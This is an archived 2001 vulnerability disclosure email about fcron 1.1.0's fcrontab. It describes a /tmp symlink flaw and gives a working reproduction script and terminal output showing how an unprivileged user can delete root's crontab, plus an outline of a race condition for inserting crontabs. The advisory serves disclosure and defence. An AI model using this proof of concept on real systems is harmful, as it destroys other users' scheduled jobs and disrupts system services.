The mail i sent to the securesoftware mailing list:
From uwe@ohse.de Thu Jun  7 17:15:10 2001
Date: Thu, 7 Jun 2001 17:15:10 +0000
From: Uwe Ohse <uwe@ohse.de>
To: securesoftware@list.cr.yp.to
Subject: [local] [destroy] fcron-1.1.0 allows anybody to delete all crontabs
Message-ID: <20010607171510.O20278@ohse.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Status: RO
Content-Length: 2720
Lines: 81

Fcron Description, from the README:

    Fcron is a scheduler. It aims at replacing Vixie Cron, so it 
    implements most of its functionalities.


Vulnerability:

  The fcrontab program contains a classical /tmp symlink vulnerability, 
  allowing any attacker to delete anybodies crontab, with the obvious 
  impact on the system services.

  This has been tested on Linux and OpenBSD.

  The author has been informed on 2001-05-07. A new release may or may not 
  be available, i was too busy to follow this. In any case the workaround 
  is obvious: make the fcrontab problem only executable for root.


How to repeat:

  1. Install a crontab, for example for the root user:

        root# ls -l /var/spool/fcron/
        total 0
        root# echo '0 0 * * * echo test' | fcrontab -
        09:53:00 installing file /tmp/fcrontab.27301 for user root
        Modifications will be taken into account right now.
        root# ls -l /var/spool/fcron/
        total 2
        -rw-------   1 root     root          110 May  7 09:53 root
        -rw-------   1 root     fcron          20 May  7 09:53 root.orig


  2. As a normal user write and execute a script:

    uwe$ cat ~/x
    #! /bin/sh
    ln -s /var/spool/fcron/rm.root /tmp/fcrontab.$$
    exec fcrontab - <<EOF
    * * * * * false
    EOF
    uwe$ ./x
    09:55:55 installing file /tmp/fcrontab.27536 for user uwe
    09:55:55 User uwe can't read file "/tmp/fcrontab.27536": Permission denied

  3. As root look into the fcron spool directory:

    root# ls -l /var/spool/fcron/
    total 3
    -rw-r-----   1 uwe      fcron          16 May  7 09:55 rm.root
    -rw-------   1 root     root          110 May  7 09:53 root
    -rw-------   1 root     fcron          20 May  7 09:53 root.orig

  4. As the normal user edit your crontab:

    uwe$ echo '* * * * * true' | fcrontab -
    09:59:15 installing file /tmp/fcrontab.27543 for user uwe
    Modifications will be taken into account at 10h00.

  5. As root wait up to a minute and look into the fcron spool directory:
 
    # ls -l /var/spool/fcron/
    total 3
    -rw-------   1 root     fcron          20 May  7 09:53 root.orig
    -rw-------   1 root     root          102 May  7 09:59 uwe
    -rw-r-----   1 fcron    fcron          15 May  7 09:59 uwe.orig

  6. Root's crontab is gone, look into your backups.


Additional risk:

    As far as i can see one can also insert new crontabs into the system, 
    but to achieve this one has to exploit a race condition.
    The key is to create a link to new.someone and to kill the fcrontab
    program just after it creates the temporary file but before the 
    program removes the file because it notices that the file is malformed.


Regards, Uwe